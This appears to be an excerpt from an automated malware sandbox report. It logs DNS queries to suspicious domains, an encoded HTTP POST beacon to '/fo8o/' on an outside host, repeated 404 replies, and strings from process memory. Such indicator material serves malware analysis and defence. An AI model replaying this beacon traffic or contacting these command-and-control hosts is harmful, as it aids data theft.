Source: global traffic	DNS traffic detected: DNS query: www.donnavariedades.com
Source: global traffic	DNS traffic detected: DNS query: www.660danm.top
Source: global traffic	DNS traffic detected: DNS query: www.empowermedeco.com
Source: global traffic	DNS traffic detected: DNS query: www.joyesi.xyz
Source: global traffic	DNS traffic detected: DNS query: www.k9vyp11no3.cfd

Source: unknown

HTTP traffic detected: POST /fo8o/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brHost: www.goldenjade-travel.comOrigin: http://www.goldenjade-travel.comCache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 204Referer: http://www.goldenjade-travel.com/fo8o/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)Data Raw: 55 7a 47 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 2b 79 4d 67 4b 55 66 37 6c 6e 42 53 54 58 45 45 48 35 64 65 51 72 61 55 31 34 63 4a 5a 61 50 52 57 73 55 6b 58 34 3d Data Ascii: UzG=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfO+yMgKUf7lnBSTXEEH5deQraU14cJZaPRWsUkX4=

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 24 Dec 2024 07:23:35 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Tue, 24 Dec 2024 07:24:00 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Tue, 24 Dec 2024 07:24:03 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Tue, 24 Dec 2024 07:24:08 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Dec 2024 07:26:03 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Dec 2024 07:26:05 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Dec 2024 07:26:08 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Dec 2024 07:26:11 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Dec 2024 07:26:18 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Dec 2024 07:26:20 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Dec 2024 07:26:23 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Dec 2024 07:26:26 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Source: yAEEhNGBaPExAdMu.exe, 00000006.00000002.4532024343.0000000004E6A000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.empowermedeco.com
Source: yAEEhNGBaPExAdMu.exe, 00000006.00000002.4532024343.0000000004E6A000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.empowermedeco.com/fo8o/
Source: netbtugc.exe, 00000004.00000002.4532618165.0000000007F8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
